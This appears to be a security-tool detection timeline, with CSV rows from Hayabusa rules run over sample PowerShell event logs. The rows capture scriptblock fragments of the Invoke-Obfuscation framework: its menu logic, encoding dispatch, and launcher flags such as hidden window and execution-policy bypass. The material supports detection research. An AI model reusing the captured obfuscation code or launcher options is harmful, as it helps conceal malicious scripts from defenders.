'Out-PowerShellLauncher'; $ObfLevel = 11} '\launcher\mshta++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 12} default {Write-Error ""An invalid value ($($BreadCrumb.ToLower())) was passed to switch block for setting `$Function when `$OverrideAcceptableInput -eq `$TRUE.""; Exit} } # Extract $ObfLevel from first element in array (in case 0th element is used for informational purposes), and extract $Token from $BreadCrumb. $ObfLevel = $Menu[1][3][2] $Token = $UserInput.SubString($UserInput.LastIndexOf('_')+1) } # Convert ObfuscatedCommand (string) to ScriptBlock for next obfuscation function. If(!($Script:LauncherApplied)) { $ObfCommandScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock($Script:ObfuscatedCommand) } # Validate that user has set SCRIPTPATH or SCRIPTBLOCK (by seeing if $Script:ObfuscatedCommand is empty). If($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute obfuscation commands without setting ScriptPath or ScriptBlock values in SHOW OPTIONS menu. Set these by executing"" -NoNewLine Write-Host ' SET SCRIPTBLOCK script_block_or_command' -NoNewLine -ForegroundColor Green Write-Host ' or' -NoNewLine Write-Host ' SET SCRIPTPATH path_to_script_or_URL' -NoNewLine -ForegroundColor Green Write-Host '.' Continue } # Save current ObfuscatedCommand to see if obfuscation was successful (i.e. no warnings prevented obfuscation from occurring). $ObfuscatedCommandBefore = $Script:ObfuscatedCommand $CmdToPrint = $NULL If($Script:LauncherApplied) { If($Function -eq 'Out-PowerShellLauncher') { $ErrorMessage = ' You have already applied a launcher to ObfuscatedCommand.' } Else { $ErrorMessage = ' You cannot obfuscate after applying a Launcher to ObfuscatedCommand.' } Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' UNDO' -NoNewLine -ForegroundColor Yellow Write-Host "" to remove the launcher from ObfuscatedCommand.`n"" -NoNewLine } Else { # Switch block to route to the correct function. Switch($Function) { 'Out-ObfuscatedTokenCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $Token $ObfLevel $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","" '$Token' $ObfLevel"") } 'Out-ObfuscatedTokenCommandAll' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","""") } 'Out-ObfuscatedStringCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedStringCommand -ScriptBlock $ObfCommandScriptBlock $ObfLevel $CmdToPrint = @(""Out-ObfuscatedStringCommand -ScriptBlock "","" $ObfLevel"") } 'Out-EncodedAsciiCommand' { $Script:ObfuscatedCommand = Out-EncodedAsciiCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedAsciiCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedHexCommand' { $Script:ObfuscatedCommand = Out-EncodedHexCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedHexCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedOctalCommand' { $Script:ObfuscatedCommand = Out-EncodedOctalCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedOctalCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBinaryCommand' { $Script:ObfuscatedCommand = Out-EncodedBinaryCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBinaryCommand -ScriptBlock "","" -PassThru"") } 'Out-SecureStringCommand' { $Script:ObfuscatedCommand = Out-SecureStringCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-SecureStringCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBXORCommand' { $Script:ObfuscatedCommand = Out-EncodedBXORCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBXORCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedSpecialCharOnlyCommand' { $Script:ObfuscatedCommand = Out-EncodedSpecialCharOnlyCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedSpecialCharOnlyCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedWhitespaceCommand' { $Script:ObfuscatedCommand = Out-EncodedWhitespaceCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedWhitespaceCommand -ScriptBlock "","" -PassThru"") } 'Out-PowerShellLauncher' { # Extract numbers from string so we can output proper flag syntax in ExecutionCommands history. $SwitchesAsStringArray = [char[]]$Token | Sort-Object -Unique | Where-Object {$_ -ne ' '} If($SwitchesAsStringArray -Contains '0') { $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $ObfLevel"") } Else { $HasWindowStyle = $FALSE $SwitchesToPrint = @() ForEach($Value in $SwitchesAsStringArray) { Switch($Value)",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"{ 1 {$SwitchesToPrint += '-NoExit'} 2 {$SwitchesToPrint += '-NonInteractive'} 3 {$SwitchesToPrint += '-NoLogo'} 4 {$SwitchesToPrint += '-NoProfile'} 5 {$SwitchesToPrint += '-Command'} 6 {If(!$HasWindowStyle) {$SwitchesToPrint += '-WindowStyle Hidden'; $HasWindowStyle = $TRUE}} 7 {$SwitchesToPrint += '-ExecutionPolicy Bypass'} 8 {$SwitchesToPrint += '-Wow64'} default {Write-Error ""An invalid `$SwitchesAsString value ($Value) was passed to switch block.""; Exit;} } } $SwitchesToPrint = $SwitchesToPrint -Join ' ' $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $SwitchesToPrint $ObfLevel"") } $Script:ObfuscatedCommand = Out-PowerShellLauncher -ScriptBlock $ObfCommandScriptBlock -SwitchesAsString $Token $ObfLevel # Only set LauncherApplied to true if before/after are different (i.e. no warnings prevented launcher from being applied). If($ObfuscatedCommandBefore -ne $Script:ObfuscatedCommand) { $Script:LauncherApplied = $TRUE } } default {Write-Error ""An invalid `$Function value ($Function) was passed to switch block.""; Exit;} } If(($Script:ObfuscatedCommand -ceq $ObfuscatedCommandBefore) -AND ($MenuName.StartsWith('_Token_'))) { Write-Host ""`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" There were not any"" -NoNewLine If($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1).ToLower() -ne 'all') {Write-Host "" $($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1))"" -NoNewLine -ForegroundColor Yellow} Write-Host "" tokens to further obfuscate, so nothing changed."" } Else { # Add to $Script:ObfuscatedCommandHistory if a change took place for the current ObfuscatedCommand. $Script:ObfuscatedCommandHistory += , $Script:ObfuscatedCommand # Convert UserInput to CLI syntax to store in CliSyntax variable if obfuscation occurred. $CliSyntaxCurrentCommand = $UserInput.Trim('_ ').Replace('_','\') # Add CLI command syntax to $Script:CliSyntax to maintain a history of commands to arrive at current obfuscated command for CLI syntax. $Script:CliSyntax += $CliSyntaxCurrentCommand # Add execution syntax to $Script:ExecutionCommands to maintain a history of commands to arrive at current obfuscated command. $Script:ExecutionCommands += ($CmdToPrint[0] + '$ScriptBlock' + $CmdToPrint[1]) # Output syntax of CLI syntax and full command we executed in above Switch block. Write-Host ""`nExecuted:`t"" Write-Host "" CLI: "" -NoNewline Write-Host $CliSyntaxCurrentCommand -ForegroundColor Cyan Write-Host "" FULL: "" -NoNewline Write-Host $CmdToPrint[0] -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta Write-Host $CmdToPrint[1] -ForegroundColor Cyan # Output obfuscation result. Write-Host ""`nResult:`t"" Out-ScriptContents $Script:ObfuscatedCommand -PrintWarning } } } } Else { Return $UserInput } } Else { If ($MenuInputOptionsShowHelp[0] -Contains $UserInput) {Show-HelpMenu} ElseIf($MenuInputOptionsShowOptions[0] -Contains $UserInput) {Show-OptionsMenu} ElseIf($TutorialInputOptions[0] -Contains $UserInput) {Show-Tutorial} ElseIf($ClearScreenInputOptions[0] -Contains $UserInput) {Clear-Host} # For Version 1.0 ASCII art is not necessary. #ElseIf($ShowAsciiArtInputOptions[0] -Contains $UserInput) {Show-AsciiArt -Random} ElseIf($ResetObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to reset."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to reset."" } Else { $Script:LauncherApplied = $FALSE $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @($Script:ScriptBlock) $Script:CliSyntax = @() $Script:ExecutionCommands = @() Write-Host ""`n`nSuccessfully reset ObfuscatedCommand."" -ForegroundColor Cyan } } ElseIf($UndoObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to undo."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to undo."" } Else { # Set ObfuscatedCommand to the last state in ObfuscatedCommandHistory. $Script:ObfuscatedCommand = $Script:ObfuscatedCommandHistory[$Script:ObfuscatedCommandHistory.Count-2] # Remove the last state from ObfuscatedCommandHistory. $Temp = $Script:ObfuscatedCommandHistory $Script:ObfuscatedCommandHistory = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ObfuscatedCommandHistory += $Temp[$i] } # Remove last command from CliSyntax. Trim all trailing OUT or CLIP commands until an obfuscation command is removed. $CliSyntaxCount = $Script:CliSyntax.Count While(($Script:CliSyntax[$CliSyntaxCount-1] -Match '^(clip|out )') -AND ($CliSyntaxCount -gt 0)) { $CliSyntaxCount-- } $Temp = $Script:CliSyntax $Script:CliSyntax = @() For($i=0; $i -lt $CliSyntaxCount-1; $i++) { $Script:CliSyntax += $Temp[$i] } # Remove last command from ExecutionCommands. $Temp = $Script:ExecutionCommands $Script:ExecutionCommands = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ExecutionCommands += $Temp[$i] } # If this is removing a launcher then we must change the launcher state so we can continue obfuscating. If($Script:LauncherApplied) { $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully removed launcher from ObfuscatedCommand."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully removed last obfuscation from ObfuscatedCommand."" -ForegroundColor Cyan } } } ElseIf(($OutputToDiskInputOptions[0] -Contains $UserInput) -OR ($OutputToDiskInputOptions[0] -Contains $UserInput.Trim().Split(' ')[0])) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Get file path information from compound user input (e.g. OUT C:\FILENAME.TXT). If($UserInput.Trim().Split(' ').Count -gt 1) { # Get file path information from user input. $UserInputOutputFilePath = $UserInput.Trim().SubString(4).Trim() Write-Host '' } Else { # Get file path information from user interactively. $UserInputOutputFilePath = Read-Host ""`n`nEnter path for output file (or leave blank for default)"" } # Decipher if user input a full file path, just a file name or nothing (default). If($UserInputOutputFilePath.Trim() -eq '') { # User did not input anything so use default filename and current directory of this script. $OutputFilePath = ""$ScriptDir\Obfuscated_Command.txt"" } ElseIf(!($UserInputOutputFilePath.Contains('\')) -AND !($UserInputOutputFilePath.Contains('/'))) { # User input is not a file path so treat it as a filename and use current directory of this script. $OutputFilePath = ""$ScriptDi",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ 1 {$SwitchesToPrint += '-NoExit'} 2 {$SwitchesToPrint += '-NonInteractive'} 3 {$SwitchesToPrint += '-NoLogo'} 4 {$SwitchesToPrint += '-NoProfile'} 5 {$SwitchesToPrint += '-Command'} 6 {If(!$HasWindowStyle) {$SwitchesToPrint += '-WindowStyle Hidden'; $HasWindowStyle = $TRUE}} 7 {$SwitchesToPrint += '-ExecutionPolicy Bypass'} 8 {$SwitchesToPrint += '-Wow64'} default {Write-Error ""An invalid `$SwitchesAsString value ($Value) was passed to switch block.""; Exit;} } } $SwitchesToPrint = $SwitchesToPrint -Join ' ' $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $SwitchesToPrint $ObfLevel"") } $Script:ObfuscatedCommand = Out-PowerShellLauncher -ScriptBlock $ObfCommandScriptBlock -SwitchesAsString $Token $ObfLevel # Only set LauncherApplied to true if before/after are different (i.e. no warnings prevented launcher from being applied). If($ObfuscatedCommandBefore -ne $Script:ObfuscatedCommand) { $Script:LauncherApplied = $TRUE } } default {Write-Error ""An invalid `$Function value ($Function) was passed to switch block.""; Exit;} } If(($Script:ObfuscatedCommand -ceq $ObfuscatedCommandBefore) -AND ($MenuName.StartsWith('_Token_'))) { Write-Host ""`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" There were not any"" -NoNewLine If($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1).ToLower() -ne 'all') {Write-Host "" $($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1))"" -NoNewLine -ForegroundColor Yellow} Write-Host "" tokens to further obfuscate, so nothing changed."" } Else { # Add to $Script:ObfuscatedCommandHistory if a change took place for the current ObfuscatedCommand. $Script:ObfuscatedCommandHistory += , $Script:ObfuscatedCommand # Convert UserInput to CLI syntax to store in CliSyntax variable if obfuscation occurred. $CliSyntaxCurrentCommand = $UserInput.Trim('_ ').Replace('_','\') # Add CLI command syntax to $Script:CliSyntax to maintain a history of commands to arrive at current obfuscated command for CLI syntax. $Script:CliSyntax += $CliSyntaxCurrentCommand # Add execution syntax to $Script:ExecutionCommands to maintain a history of commands to arrive at current obfuscated command. $Script:ExecutionCommands += ($CmdToPrint[0] + '$ScriptBlock' + $CmdToPrint[1]) # Output syntax of CLI syntax and full command we executed in above Switch block. Write-Host ""`nExecuted:`t"" Write-Host "" CLI: "" -NoNewline Write-Host $CliSyntaxCurrentCommand -ForegroundColor Cyan Write-Host "" FULL: "" -NoNewline Write-Host $CmdToPrint[0] -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta Write-Host $CmdToPrint[1] -ForegroundColor Cyan # Output obfuscation result. Write-Host ""`nResult:`t"" Out-ScriptContents $Script:ObfuscatedCommand -PrintWarning } } } } Else { Return $UserInput } } Else { If ($MenuInputOptionsShowHelp[0] -Contains $UserInput) {Show-HelpMenu} ElseIf($MenuInputOptionsShowOptions[0] -Contains $UserInput) {Show-OptionsMenu} ElseIf($TutorialInputOptions[0] -Contains $UserInput) {Show-Tutorial} ElseIf($ClearScreenInputOptions[0] -Contains $UserInput) {Clear-Host} # For Version 1.0 ASCII art is not necessary. #ElseIf($ShowAsciiArtInputOptions[0] -Contains $UserInput) {Show-AsciiArt -Random} ElseIf($ResetObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to reset."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to reset."" } Else { $Script:LauncherApplied = $FALSE $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @($Script:ScriptBlock) $Script:CliSyntax = @() $Script:ExecutionCommands = @() Write-Host ""`n`nSuccessfully reset ObfuscatedCommand."" -ForegroundColor Cyan } } ElseIf($UndoObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to undo."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to undo."" } Else { # Set ObfuscatedCommand to the last state in ObfuscatedCommandHistory. $Script:ObfuscatedCommand = $Script:ObfuscatedCommandHistory[$Script:ObfuscatedCommandHistory.Count-2] # Remove the last state from ObfuscatedCommandHistory. $Temp = $Script:ObfuscatedCommandHistory $Script:ObfuscatedCommandHistory = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ObfuscatedCommandHistory += $Temp[$i] } # Remove last command from CliSyntax. Trim all trailing OUT or CLIP commands until an obfuscation command is removed. $CliSyntaxCount = $Script:CliSyntax.Count While(($Script:CliSyntax[$CliSyntaxCount-1] -Match '^(clip|out )') -AND ($CliSyntaxCount -gt 0)) { $CliSyntaxCount-- } $Temp = $Script:CliSyntax $Script:CliSyntax = @() For($i=0; $i -lt $CliSyntaxCount-1; $i++) { $Script:CliSyntax += $Temp[$i] } # Remove last command from ExecutionCommands. $Temp = $Script:ExecutionCommands $Script:ExecutionCommands = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ExecutionCommands += $Temp[$i] } # If this is removing a launcher then we must change the launcher state so we can continue obfuscating. If($Script:LauncherApplied) { $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully removed launcher from ObfuscatedCommand."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully removed last obfuscation from ObfuscatedCommand."" -ForegroundColor Cyan } } } ElseIf(($OutputToDiskInputOptions[0] -Contains $UserInput) -OR ($OutputToDiskInputOptions[0] -Contains $UserInput.Trim().Split(' ')[0])) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Get file path information from compound user input (e.g. OUT C:\FILENAME.TXT). If($UserInput.Trim().Split(' ').Count -gt 1) { # Get file path information from user input. $UserInputOutputFilePath = $UserInput.Trim().SubString(4).Trim() Write-Host '' } Else { # Get file path information from user interactively. $UserInputOutputFilePath = Read-Host ""`n`nEnter path for output file (or leave blank for default)"" } # Decipher if user input a full file path, just a file name or nothing (default). If($UserInputOutputFilePath.Trim() -eq '') { # User did not input anything so use default filename and current directory of this script. $OutputFilePath = ""$ScriptDir\Obfuscated_Command.txt"" } ElseIf(!($UserInputOutputFilePath.Contains('\')) -AND !($UserInputOutputFilePath.Contains('/'))) { # User input is not a file path so treat it as a filename and use current directory of this script. $OutputFilePath = ""$ScriptDi",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"r\$($UserInputOutputFilePath.Trim())"" } Else { # User input is a full file path. $OutputFilePath = $UserInputOutputFilePath } # Write ObfuscatedCommand out to disk. Write-Output $Script:ObfuscatedCommand > $OutputFilePath If($Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host "".`nA Launcher has been applied so this script cannot be run as a standalone .ps1 file."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } ElseIf(!$Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } Else { Write-Host ""`nERROR: Unable to write ObfuscatedCommand out to"" -NoNewLine -ForegroundColor Red Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow } } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to write out to disk.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } } ElseIf($CopyToClipboardInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Copy ObfuscatedCommand to clipboard. # Try-Catch block introduced since PowerShell v2.0 without -STA defined will not be able to perform clipboard functionality. Try { $Null = [Reflection.Assembly]::LoadWithPartialName(""System.Windows.Forms"") [Windows.Forms.Clipboard]::SetText($Script:ObfuscatedCommand) If($Script:LauncherApplied) { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard.`nNo Launcher has been applied, so command can only be pasted into powershell.exe."" -ForegroundColor Cyan } } Catch { $ErrorMessage = ""Clipboard functionality will not work in PowerShell version $($PsVersionTable.PsVersion.Major) unless you add -STA (Single-Threaded Apartment) execution flag to powershell.exe."" If((Get-Command Write-Host).CommandType -ne 'Cmdlet') { # Retrieving Write-Host and Start-Sleep Cmdlets to get around the current proxy functions of Write-Host and Start-Sleep that are overloaded if -Quiet flag was used. . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) $ErrorMessage -NoNewLine . ((Get-Command Start-Sleep) | Where-Object {$_.CommandType -eq 'Cmdlet'}) 2 } Else { Write-Host ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage If($Script:CliSyntax -gt 0) {Start-Sleep 2} } } $Script:CliSyntax += 'clip' } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to copy to your clipboard.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" -NoNewLine } } ElseIf($ExecutionInputOptions[0] -Contains $UserInput) { If($Script:LauncherApplied) { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have applied a Launcher.`n Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForeGroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForeGroundColor Yellow Write-Host "" and paste into cmd.exe.`n Or enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForeGroundColor Yellow Write-Host "" to remove the Launcher from ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { If($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) {Write-Host ""`n`nInvoking (though you haven't obfuscated anything yet):""} Else {Write-Host ""`n`nInvoking:""} Out-ScriptContents $Script:ObfuscatedCommand Write-Host '' $null = Invoke-Expression $Script:ObfuscatedCommand } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have not set ScriptPath or ScriptBlock.`n Enter"" -NoNewline Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" to set ScriptPath or ScriptBlock."" } } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" You entered an invalid option. Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host "" for more information."" # If the failed input was part of $Script:CompoundCommand then cancel out the rest of the compound command so it is not further processed. If($Script:CompoundCommand.Count -gt 0) { $Script:CompoundCommand = @() } # Output all available/acceptable options for current menu if invalid input was entered. If($AcceptableInput.Count -gt 1) { $Message = 'Valid options for current menu include:' } Else { $Message = 'Valid option for current menu includes:' } Write-Host "" $Message "" -NoNewLine $Counter=0 ForEach($AcceptableOption in $AcceptableInput) { $Counter++ # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host $AcceptableOption -NoNewLine -ForegroundColor $ColorToOutput If(($Counter -lt $AcceptableInput.Length) -AND ($AcceptableOption.Length -gt 0)) { Write-Host ', ' -NoNewLine } } Write-Host '' } } } Return $UserInput.ToLower() } Function Show-OptionsMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays options menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-OptionsMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-OptionsMenu displays options menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-OptionsMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set potentially-updated script-level values in $Script:OptionsMenu before displaying. $Counter = 0 ForEach($Line in $Script:OptionsMenu) { If($Line[0].ToLower().Trim() -eq 'scriptpath') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptPath} If($Line[0].ToLower().Trim() -eq 'scriptblock') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptBlock} If($Line[0].ToLower().Trim() -eq 'commandlinesyntax') {$Script:OptionsMenu[$Counter][1] = $Script:CliSyntax} If($Line[0].ToLower().Trim() -eq 'executioncommands') {$Script:OptionsMenu[$Counter][1] = $Script:ExecutionCommands} If($Line[0].ToLower().Trim() -eq 'obfuscatedcommand') { # Only add obfuscatedcommand if it is different than scriptblock (to avoid showing obfuscatedcommand before it has been obfuscated). If($Script:ObfuscatedCommand -cne $Script:ScriptBlock) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand} Else {$Script:OptionsMenu[$Counter][1] = ''} } If($Line[0].ToLower().Trim() -eq 'obfuscationlength') { # Only set/display ObfuscationLength if there is an obfuscated command. If(($Script:ObfuscatedCommand.Length -gt 0) -AND ($Script:ObfuscatedCommand -cne $Script:ScriptBlock)) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand.Length} Else {$Script:OptionsMenu[$Counter][1] = ''} } $Counter++",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"r\$($UserInputOutputFilePath.Trim())"" } Else { # User input is a full file path. $OutputFilePath = $UserInputOutputFilePath } # Write ObfuscatedCommand out to disk. Write-Output $Script:ObfuscatedCommand > $OutputFilePath If($Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host "".`nA Launcher has been applied so this script cannot be run as a standalone .ps1 file."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } ElseIf(!$Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" 